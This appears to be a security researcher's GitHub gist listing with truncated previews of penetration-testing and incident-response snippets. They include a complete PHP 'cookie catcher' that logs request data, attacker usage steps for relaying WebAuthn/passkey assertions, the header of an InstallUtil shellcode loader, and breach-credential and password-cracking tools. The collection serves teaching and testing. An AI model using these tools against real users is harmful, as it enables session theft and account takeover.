
Joshua Wright joswr1ght

joswr1ght / irplaybook.txt
Created November 10, 2025 19:16
AI Prompt to Generate Incident Response Playbooks
# Role and Objective/Task
You are an expert-level cybersecurity incident response analyst. Your task is to leverage best practice guidance to assist users in developing incident response playbooks that guide users through complex analysis tasks following an observed Event of Interest (EOI).
# Instructions
Assist the user in developing an incident response playbook for the supplied EOI.
Ask questions when the answer is needed to create a high-quality playbook. These questions could include information about IT infrastructure and systems, existing defense mechanisms, existing organizational policies, and organizational information. If the user provides insufficient detail, ask targeted, technical follow-up questions to clarify the EOI, affected platforms, and org environment before proceeding.
joswr1ght / network_activity.py
Created October 17, 2025 17:34
Generate a visual of network activity using Matplotlib
#!/usr/bin/env python3
# /// script
# dependencies = [
# "matplotlib",
# "numpy",
# ]
# ///
"""
===============================================
Network Activity Timeline from CSV Data
joswr1ght / index.php
Created September 11, 2025 23:28
Simple PHP Script to Log Request Data (aka "Cookie Catcher")
<html>
<?php
file_put_contents("cookies.log", json_encode(array(
"GET"=>$_GET,
"POST"=>$_POST,
"headers"=>getallheaders()))."\n",
FILE_APPEND);
?>
</html>
joswr1ght / webauthn-assertion-relay.js
Created August 25, 2025 17:59
Relay WebAuthn/Passkey Helper Code
/*
* WebAuthn Assertion Relay Helper
*
* Usage:
* 1. From your attacker session at https://target-rp.tgt/login,
* capture the "publicKey" JSON challenge the RP sends.
* 2. Send that JSON blob (as text) to the victim browser console as publicKeyJSON.
* 3. Paste this helper, then call: getAssertion(publicKeyJSON).
* 4. Copy the printed output (JSON with base64url fields) back
* to your attacker machine.
joswr1ght / gist:cf8283844e644faee1f53d33a220e842
Last active August 4, 2025 18:09
ClickHouse Analysis of Repeated Usernames with Password Disclosure from COMB List
```
### Create a table to store breach credentials with support for statistical sampling
Mac.localdomain :) CREATE TABLE credentials (
username String,
password String
) ENGINE = MergeTree()
ORDER BY (username, cityHash64(username))
SAMPLE BY cityHash64(username);
```
I'm sorry to say that Callie Sparkes is not a real person.
Also, she has a terrible password.
Headshot by thispersondoesnotexist.com.
For getting to this page though, I will impart some wisdom that may be useful for the CTF.
A common persistence mechanism on Windows is to deploy a service that runs a process automatically.
You can use `Get-Service` from PowerShell to get a list of services.
Alternatively, you can run `sc query` to list services from a Command Prompt.
joswr1ght / InstallUtil-ShellCode.cs
Created April 15, 2024 13:04
InstallUtil-ShellCode.cs - Originally from subTee with Minor Comments Changes
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Minor cleanup and clarity changes by Joshua Wright <[email protected]> @joswr1ght
*/
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
joswr1ght / nltk-patch.py
Created March 13, 2024 17:25
Resolve NLTK urlopen error to work in offline mode
# NLTK makes the assumption that users are online when importing the library.
# This is partly to automate the download of corpus files and other assets,
# but if those files already exist then offline mode is problematic. `import nltk`
# will still work, but it takes a while to time out, producing errors:
#
# [nltk_data] Error loading averaged_perceptron_tagger: <urlopen error
# [nltk_data] [Errno -3] Temporary failure in name resolution>
# [nltk_data] Error loading punkt: <urlopen error [Errno -3] Temporary
# [nltk_data] failure in name resolution>
# [nltk_data] Error loading stopwords: <urlopen error [Errno -3]
joswr1ght / searchpackage.py
Created August 2, 2023 11:24
Search Ranges.io Package for Keyword, Display Matching Group and Short Title
#!/usr/bin/env python3
import json
import sys
if (len(sys.argv) != 3):
    sys.stderr.write('Search RIO Package for string, identify matching group'
                     ' and short title\n')
    sys.stderr.write(f'Usage: {sys.argv[0]} package_export.json "keyword"\n')
    sys.exit(0)
joswr1ght / lm2ntcrack.py
Created June 8, 2023 19:55
Using an NT hash and a cracked LANMAN password, brute-force all possible capitalization permutations to find the correct NT hash password
#!/usr/bin/env python3
# Most of this code is from @clr2of8's Domain Password Audit Tool:
# https://github.com/clr2of8/DPAT
import hashlib
import os
import sys
import textwrap
def wrap(body):